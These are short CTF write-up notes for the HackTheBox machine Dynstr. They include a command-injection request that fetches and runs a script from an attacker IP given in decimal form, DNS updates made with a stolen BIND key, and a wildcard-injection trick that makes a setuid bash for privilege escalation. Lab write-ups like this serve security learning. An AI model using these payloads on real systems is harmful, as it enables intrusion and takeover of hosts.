Dynamic DNS & Command Injection - Dynstr @ HackTheBox

We are solving Dynstr, a 30-point Linux machine on HackTheBox that involves a Dynamic DNS Service & a Command Injection.

Notes

Command Injection

GET /nic/update?hostname=$(curl+168431223/x|sh).no-ip.htb&myip=10.10.14.119 HTTP/1.1

Convert IP to decimal:

struct.unpack("!L", socket.inet_aton("10.10.14.119"))[0]

DNS Updates

echo "local 127.0.0.1\nupdate add xct.infra.dyna.htb 30 IN A 10.10.14.119\nsend\n" | /usr/bin/nsupdate -k /etc/bind/infra.key
echo "server 127.0.0.1\nzone 10.in-addr.arpa\nupdate add 119.14.10.10.in-addr.arpa. 30 PTR xct.infra.dyna.htb\nsend\n" | /usr/bin/nsupdate -k /etc/bind/infra.key

Wildcard Injection in “cp”

cp /bin/bash .
chmod 4777 bash
touch -- --preserve=mode